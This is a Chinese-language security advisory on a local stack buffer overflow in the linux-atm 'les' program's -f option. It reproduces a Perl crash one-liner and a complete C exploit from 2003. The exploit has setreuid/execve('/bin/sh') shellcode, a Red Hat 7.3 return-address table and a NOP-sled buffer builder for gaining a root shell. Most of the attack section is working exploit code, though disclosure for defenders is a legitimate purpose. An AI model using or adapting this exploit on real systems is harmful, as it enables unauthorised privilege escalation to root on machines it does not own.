Linux命令
涉及程序:
linux-atm les 2.4
描述:
Linux-ATM LES命令行參數本地緩沖區溢出
詳細:
Linux當前支持ATM,目前是實驗階段,支持RAW ATM連接、IP通過ATM、LAN模擬、MPOA等功能。
linux-atm 'les'可執行文件對命令行參數缺少正確的緩沖區邊界檢查,本地攻擊者可以利用這個漏洞進行緩沖區溢出攻擊,可能以root用戶權限在系統上執行任意指令。
'/usr/local/sbin/les'程序對用戶提交給-f選項的數據缺少正確邊界檢查,提交超過252字節的數據可觸發緩沖區溢出,精心構建提交數據可能以root用戶權限在系統上執行任意指令。
攻擊方法:
Angelo Rosiello (
[email protected])提供了如下測試方法:
/usr/local/sbin/les -f `perl -e 'print "A"x252'`
Angelo Rosiello(
[email protected]) 提供了如下測試程序:
/*
*** Exploit against the linux-atm project
***
*** http://sourceforge.net/projects/linux-atm
***************************************************************
*** VULNERABILITY
***
*** Stack Overflow discovered by Angelo Rosiello
*** /usr/local/sbin/les -f `perl -e 'print "A"x252'`
*** Program received signal SIGSEGV, Segmentation fault.
*** 0x41414141 in ?? ()
****************************************************************
*** AUTHOR: Angelo Rosiello
*** CONTACT:
[email protected],
[email protected]
***
[email protected]
***
*** Copyright (c) 2003 DTORS Security
*** All rights reserved.
*** http://dtors.net
***
*** SHELLCODE by esDee
***
*** 18/02/2003
***
*/
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#define NOP 0x90 // No operation instruction
#define LEN 252 // Our buffer size
void usage();
static char shellcode[] =
// setreuid(0,0);
"\x31\xc0" // xor %eax,%eax
"\x31\xdb" // xor %ebx,%ebx
"\x31\xc9" // xor %ecx,%ecx
"\xb0\x46" // mov $0x46,%al
"\xcd\x80" // int $0x80
// execve /bin/sh
"\x31\xc0" // xor %eax,%eax
"\x50" // push %eax
"\x68\x2f\x2f\x73\x68" // push $0x68732f2f
"\x68\x2f\x62\x69\x6e" // push $0x6e69622f
"\x89\xe3" // mov %esp,%ebx
"\x8d\x54\x24\x08" // lea 0x8(%esp,1),%edx
"\x50" // push %eax
"\x53" // push %ebx
"\x8d\x0c\x24" // lea (%esp,1),%ecx
"\xb0\x0b" // mov $0xb,%al
"\xcd\x80" // int $0x80
// exit();
"\x31\xc0" // xor %eax,%eax
"\xb0\x01" // mov $0x1,%al
"\xcd\x80"; // int $0x80
struct
{
int number;
char *version;
long ret;
char path[256];
} target[] =
{
{1," Red Hat Linux release 7.3 (Valhalla)",
0xbffff860, "/usr/local/sbin/les"},
{2," No defined", 0xffffffff , "/usr/local/sbin/les"},
};
main(int argc, char *argv[])
{
char buffer[LEN];
int i;
long ret;
char *PATH;
int selection;
if(argc == 1)
{
usage((char **)argv[0]);
exit(1);
}
selection = atoi(argv[2]);
printf("Ret = 0x%lx and PATH= %s\n", target[selection-1].ret, (char **)target[selection-1].path);
printf("\nCopyright (c) 2003 DTORS Security\n");
printf("ANGELO ROSIELLO 18/02/2003\n");
printf("\tLES-EXPLOIT for Linux x86\n\n");
ret = target[selection-1].ret;
PATH = target[selection-1].path;
// Build the overflow string.
for (i = 0; i < LEN; i += 4) *(long *) &buffer[i] = ret;
// copy NOP
for (i=0; i<(LEN-strlen(shellcode)-25);i++) *(buffer+i) = NOP;
// Copy the shellcode into the buffer.
memcpy(buffer+i,shellcode,strlen(shellcode));
// Execute the program
execl(PATH, "les", "-f", buffer, NULL);
}
void usage(char *argv[])
{
int i = 0;
printf("\nUsage:\n%s -t [target number]\n\nTargets\n",*(char **)&argv);
while(target[i].number)
{
printf("[%d] %s \n", target[i].number, target[i].version);
i++;
}
}
解決方案:
目前廠商還沒有提供補丁或者升級程序,建議用戶隨時關注廠商的主頁以獲取最新版本:
http://sourceforge.net/projects/linux-atm
附加信息:
無